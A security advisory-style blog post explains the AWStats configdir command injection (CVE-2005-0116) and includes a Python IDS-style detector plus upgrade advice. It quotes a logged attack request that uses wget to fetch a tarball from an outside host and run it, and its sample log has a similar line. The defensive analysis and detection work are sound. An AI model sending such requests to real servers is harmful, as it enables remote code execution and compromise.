Cyberattacks December 2011 – AWStats Remote Command Execution Vulnerability
AWStats is a free, powerful tool that generates advanced web, streaming, FTP or mail server statistics graphically. This remote command execution vulnerability [CVE-2005-0116] was first reported back in 2005.
From one of the sample IDS logs:
The source is sending a hostile HTTP request towards the target:
GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20.a;wget%20http://fbi.php5.sk/qmail.tgz;tar%20-xzvf%20qmail.tgz;cd%20qmail;./start;echo%20;echo| HTTP/1.1
Via this specially crafted HTTP request, the attacker intends to exploit a bug that resides in the awstats.pl Perl script. The script does not correctly sanitize the user input for the ‘configdir’ parameter. When ‘awstats.pl’ is run as a CGI (Common Gateway Interface) script, it fails to validate specific inputs which are then used in a Perl open() function call. Note here that the bug exists only in AWStats version 6.2 and below. By exploiting this vulnerability, a remote attacker could supply AWStats malicious input, potentially allowing the execution of arbitrary code WITH THE RIGHTS of the web server.
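As an added example (not code from the original post), a small Python detector that applies the same check an IDS signature would to request lines like the one above: it decodes the configdir parameter and flags the shell metacharacters that Perl's open() would act on. The sample log records and the attacker.invalid host are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Perl's two-argument open() runs its argument as a command when the string
# starts or ends with '|'; the other characters chain further commands. None
# belongs in a directory name, so any of them in 'configdir' marks an attempt.
SHELL_META = re.compile(r'[|;&`$<>\n]')
# Request line wherever it sits in the record: a bare "GET /... HTTP/1.1"
# (as in the IDS log above) or an access-log line that quotes it.
REQUEST_LINE = re.compile(r'(GET|POST|HEAD) (\S+) HTTP/\d\.\d')

def query_params(query):
    # Decode name=value pairs ourselves: splitting on ';' (as older parse_qs
    # does) would cut the injected value apart and hide its metacharacters.
    params = {}
    for pair in query.split('&'):
        key, _, val = pair.partition('=')
        params.setdefault(unquote_plus(key), []).append(unquote_plus(val))
    return params

def check_request_line(line):
    # Return a finding dict for an awstats.pl configdir injection, else None.
    m = REQUEST_LINE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(2))
    if not target.path.endswith('/awstats.pl'):
        return None
    for value in query_params(target.query).get('configdir', []):
        hits = SHELL_META.findall(value)
        if hits:
            return {'path': target.path, 'value': value,
                    'metachars': sorted(set(hits))}
    return None

def scan_log(lines):
    # Run the check over every record and collect the findings.
    return [f for f in map(check_request_line, lines) if f]

# Constructed sample records (not from the original post); the host is a
# placeholder in the reserved .invalid domain.
SAMPLE_LOG = [
    'GET /cgi-bin/awstats.pl?config=www.example.com&output=main HTTP/1.1',
    'GET /cgi-bin/awstats.pl?configdir=/etc/awstats HTTP/1.1',
    'GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;'
    'wget%20http://attacker.invalid/x.tgz;echo| HTTP/1.1',
]

if __name__ == '__main__':
    print(*scan_log(SAMPLE_LOG), sep='\n')
```

A legitimate configdir value is a plain filesystem path, so the benign records produce no finding and only the piped value is reported.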
Ensure AWStats has been upgraded to the latest version (6.9 or later).
Any security-related issues on AWStats are available here: